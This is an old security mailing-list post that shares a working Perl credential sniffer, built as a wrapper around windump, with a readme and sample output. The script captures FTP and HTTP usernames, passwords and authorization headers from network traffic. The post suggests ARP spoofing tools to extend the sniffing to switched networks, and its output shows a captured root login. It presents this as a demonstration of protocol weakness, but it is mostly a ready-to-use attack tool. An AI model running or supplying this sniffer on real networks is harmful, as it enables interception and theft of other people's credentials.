Perl Script wrapper for Windump

["Susan Chan Lee" <susan.lee () securityassoc com>]

Hi
 
Just thought, this Perl script may be useful to you all. 
 
This script is essentially a wrapper around windump and demonstrates
the weaknesses of the FTP and HTTP protocols. It will cleanly capture
and display all FTP and HTTP usernames and passwords and has been
configured for Proxy support (port 8080 and 8088 - modify script for
your specific requirements). It is most effective on hubbed networks.
To use on switched networks use arpspoof and fragrouter or something
similar for best results. 
 
Thanks
 
Susan Chan Lee
Security Associates - Singapore
 
#!/usr/bin/perl
# Author: Susan Lee
# email: susan.lee () securityassoc com
# File: sort.pl
# Usage: perl sort.pl
 
$LIMIT = shift || 25000;
 
$|=1;
open (STDIN,"windump  -lnx -s 1024 dst port 80 or 8080 or 8088 or 21
|");
while (<>) {
    if (/^\S/) {
 last unless $LIMIT--;
 while
($packet=~/(USER|PASS|GET|POST|WWW-Authenticate|Authorization).+/g) 
{
     print "$client -> $host\t$&\n";
 }
 undef $client; undef $host; undef $packet;
 ($client,$host) = /(\d+\.\d+\.\d+\.\d+).+ > (\d+\.\d+\.\d+\.\d+)/
     if /P \d+:\d+\((\d+)\)/ && $1 > 0;
    }
    next unless $client && $host;
    s/\s+//;
    s/([0-9a-f]{2})\s?/chr(hex($1))/eg;
    tr/\x1F-\x7E\r\n//cd;
    $packet .= $_;
}
 
# End of Script
 
Readme File:
 
Tested successfully using ActiveState Perl
(http://www.activestate.com).
This script is essentially a wrapper around windump and demonstrates
the weaknesses of the FTP and HTTP protocols. It will cleanly capture
and display all FTP and HTTP usernames and passwords and has been 
configured for Proxy support (port 8080 and 8088 - modify script for
your specific requirements). It is most effective on hubbed networks.
To use on switched networks use arpspoof and fragrouter or something
similar for 
best results. 
 
Sort.pl builds on a script written by Lincoln Stein. This script is a
port to Windows and makes some other modifications. 
 
This script is really a wrap around the Windump program, which needs
to installed and configured on your system for this script to work
(http://netgroup-serv.polito.it/windump/) sort.pl assumes windump is
in your system path. If your system has multiple interfaces
(including dial-up interfaces), then you’ll need to tell windump
which interface to listen on via the –i X command, where X in 
the number of the interface and edit the script appropriately (line
8). Use the windump –D command to see all interfaces on your system.
 
An example is given below:
 
C:\Temp\ps>perl sort.pl
windump: listening
on\Device\Packet_{1443C46F-E2B6-404F-9588-BB555B2E3764}
172.1.3.130 -> 172.1.4.231      USER root
172.1.3.130 -> 172.1.4.231      PASS london
172.1.3.130 -> 10.168.13.1     GET
http://packetstormsecurity.nl/images/ps.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1     GET
http://packetstormsecurity.nl/images/spacer.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1     GET
http://packetstormsecurity.nl/images/go.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1     GET
http://packetstormsecurity.nl/images/search.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1     GET
http://packetstormsecurity.nl/images/bg_area2.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1     GET
http://packetstormsecurity.nl/images/top.gif HTTP/1.1
493 packets received by filter
0 packets dropped by kernel
 


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/